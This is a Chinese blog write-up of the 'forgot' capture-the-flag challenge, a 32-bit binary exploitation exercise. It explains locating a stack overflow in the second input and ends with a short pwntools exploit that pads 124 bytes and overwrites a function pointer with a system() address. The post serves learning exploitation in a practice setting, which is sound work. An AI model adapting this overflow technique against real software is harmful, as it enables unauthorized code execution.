进阶区forgotg攻防世界
2024-09-03 05:33:16
攻防世界进阶区--forgot
前言,这题中看不中用啊宝友!!!
1.查看保护
第一反应就是蛮简单的,32位.
2.获取信息(先运行程序看看)
装的可以,蛮多的东西。
但是就是中看不中用
3.ida
进去看看
里面有两个输入,第一个我本来以为能溢出覆盖掉v14的数值,然后在最后的这句
用函数指针(还是指针函数来着我忘了),去调用这道题给出来的system,结果我试了试发现覆盖不到,就很气。
平日见到的scanf(%s)覆盖是不多的,所以没有太想到这里溢出点是第二个向v2里面传输数据。
使用cyclic看看溢出偏移的量:
得到之后直接写exp。
from pwn import*
p=process('./forgot')
system_add=0x80486cc
payload1='a'*124+p32(system_add)
p.recvuntil("> ")
p.sendline("baba")
p.recvuntil("> ")
p.sendline(payload1)
p.interactive()
入门题吧算是.
最新文章
- [Android] charles高级使用总结
- ThinkPHP 3.2.3(二)配置
- C#Json序列化数据库对象
- taiyi_interview(Introduction To Database Refactoring)
- 基于资源的权限系统-API设计
- 图文详解Unity3D中Material的Tiling和Offset是怎么回事
- ios NSLog常见使用
- ThinkPHP 关联模型中查询某条记录的父级(非查询子级)
- HDU 5100
- 通过 ANE(Adobe Native Extension) 启动Andriod服务 推送消息(四)
- LD1-K(求差值最小的生成树)
- Android_CodeWiki_04
- 深入理解C#中的String
- [PHP开发] phpmailer问题 错误原因: Could not instantiate mail function
- CXF安装和配置时出现Exception in thread "main" java.lang.UnsupportedClassVersionError:异常?
- The type com.google.protobuf.GeneratedMessageV3$Builder cannot be resolved. It is indirectly referenced from required .classfiles
- 20165220 实验三 敏捷开发与XP实践 实验报告
- c语言学习笔记-continue
- nRF52832-GPIOTE部分
- C/C++捕获段错误,打印出错的具体位置(精确到哪一行)_转